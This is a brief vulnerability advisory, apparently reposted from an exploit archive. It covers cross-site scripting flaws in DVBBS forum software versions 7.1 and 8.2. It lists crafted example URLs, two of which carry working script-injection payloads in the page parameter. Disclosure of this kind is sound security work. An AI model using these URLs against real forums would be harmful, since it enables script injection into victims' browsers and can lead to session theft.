Home / os / winme

DVBBS Multiple Cross Site Scripting Vulnerabilities

Posted on 08 March 2010

=================================================== DVBBS Multiple Cross Site Scripting Vulnerabilities =================================================== Remote: Yes Credit: lostmon is credited with the discovery of this vulnerability. Vulnerable: Dvbbs Dvbbs 8.2 Dvbbs Dvbbs 7.1 Sp2 Dvbbs Dvbbs 7.1 An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious URI. Examples have been provided: http://www.example.com/dispbbs.asp?boardID=8&amp;ID=550194&amp;page=1[XSS-CODE] http://www.example.com/dispuser.asp?name=Walltrapass[XSS-CODE] http://www.example.com/boardhelp.asp?boardid=0&amp;act=2&amp;title=[XSS-CODE] http://www.example.com/boardhelp.asp?boardid=0&amp;view=faq[XSS-CODE]&amp;act=3 http://www.example.com/boardhelp.asp?boardid=0&amp;view=faq&amp;act=3[XSS-CODE] http://www.example.com/boardhelp.asp?boardid=0&amp;act=2[XSS-CODE]&amp;title= http://www.example.com:80/dispbbs.asp?boardid=1&id=1&page="><script>alert(/liscker/);</script> http://www.example.com:80/forum1/list.asp?boardid=1&id=1&page=><script>alert(/liscker/);</script> # ~ - [ [ : Inj3ct0r : ] ]

 

TOP